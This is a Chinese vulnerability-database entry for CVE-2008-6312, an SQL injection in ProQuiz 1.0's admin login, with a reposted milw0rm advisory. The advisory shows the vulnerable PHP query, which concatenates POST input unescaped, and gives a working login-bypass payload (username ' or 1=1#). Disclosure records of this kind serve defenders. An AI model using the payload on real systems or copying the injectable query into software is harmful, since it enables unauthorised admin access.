Manzovi ProQuiz 'index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116987 漏洞类型 SQL注入
发布时间 2008-12-09 更新时间 2009-02-27
CVE编号 CVE-2008-6312 CNNVD-ID CNNVD-200902-629
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7397
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-629
|漏洞详情
ProQuiz1.0版本的index.php中存在SQL注入漏洞。远程攻击者可以借助username参数,执行任意SQL指令。
|漏洞EXP
----------------------------------------------------------------------------------------------------------------------------------------------------------------
 [0] GENERAL DETAILS:

Name           :  ProQuiz 1.0 Sql Injection (Auth bypass)
Download       :  http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754
Vulnerability  :  Sql Injection (Admin Login Bypass)
Author         :  Osirys
Contact        :  osirys[at]live[dot]it

----------------------------------------------------------------------------------------------------------------------------------------------------------------
 [1] BUG EXPLANATION:

The affected file is /admin/index.php. Let's see the code.

[CODE]
if($_GET['menu'] != 'madmin')
	{
	if(isset($_POST['username']) && isset($_POST['password']))
		{
			$query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' ";
[/CODE]

----------------------------------------------------------------------------------------------------------------------------------------------------------------
 [2] EXPLOITATION:

Just go in /[path]/admin/index.php. Login with the following details:
Username : ' or 1=1#
Password : anything

----------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-12-09]
|参考资料

来源:XF
名称:proquiz-index-sql-injection(47196)
链接:http://xforce.iss.net/xforce/xfdb/47196
来源:BID
名称:32724
链接:http://www.securityfocus.com/bid/32724
来源:MILW0RM
名称:7397
链接:http://www.milw0rm.com/exploits/7397